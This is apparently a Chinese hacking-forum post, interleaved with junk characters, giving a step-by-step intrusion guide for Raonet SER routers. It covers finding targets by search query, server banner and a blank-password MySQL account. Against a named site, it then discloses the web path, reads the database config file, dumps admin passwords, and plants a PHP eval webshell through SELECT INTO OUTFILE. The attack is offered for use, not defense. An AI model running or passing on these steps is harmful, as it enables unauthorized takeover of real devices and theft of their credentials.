寻找存在漏洞的路由器方法:
4 {% K5 J# [; \; K9 I o& u9 X/ q3 b. ? t. [6 K' N* k
1:google搜索'Raonet Subscriber Ethernet Router'
" s+ S1 m4 r* ~8 B* s7 H* `" U, ^; \3 [
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001+ D& S% j! K8 q X" }% X, }# u
$ ^" Q6 K }) U1 b3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
. \4 d) y- r0 Q e5 J2 ~! i; b' a& x$ x! v. C
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 I" a0 F, y/ h9 x, c% ^; K" {2 G& h8 U
! i4 z8 T& q I& J5 z) }: A
. E. y1 b2 k4 b, M; s: \- M0 g入侵步骤:3 h# i; v2 m& Z1 _+ f
, A6 ^9 F8 ~9 h# g8 a# k
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
6 q! X5 s4 U& s, n, w
+ @, G0 s+ v7 H& v4 _$ P" {+ I. \2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
% M8 l/ _ _! V! F: f6 ?% l6 M3:得到密码后连接,查看GUI管理密码:$ ~6 L2 t @, F, G0 T4 k
use ser_500" @0 s" l5 C7 E5 \( M9 o Q6 X2 X. w
select id,passwd from user;6 \# ?2 E) q3 |/ s+ s
4:通过数据库写入webshell,执行命令:
2 J' @) o- d( Suse mysql;
7 R: m! m3 t+ m; u2 @) xcreate table ok(cmd TEXT);
% T' v; c5 f- minsert into ok values("<?php @eval($_POST[cmd])?>");
5 u- ]4 @) U* V. M+ J+ }select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
6 v; C/ ~9 ^. p( \' Ddrop table ok;
1 c& u$ ~7 o; L) I; W" g7 v$ e2 s7 K$ x R. K# L& t' D
5:连接后门shell.php
8 X, v5 ?3 V/ P! Y/ N3 Z# V) D2 P8 b& E- z' P) H
6. 搞定!/ K! @ @# D; `' v
- L0 x; U _6 N9 C$ ?. n
|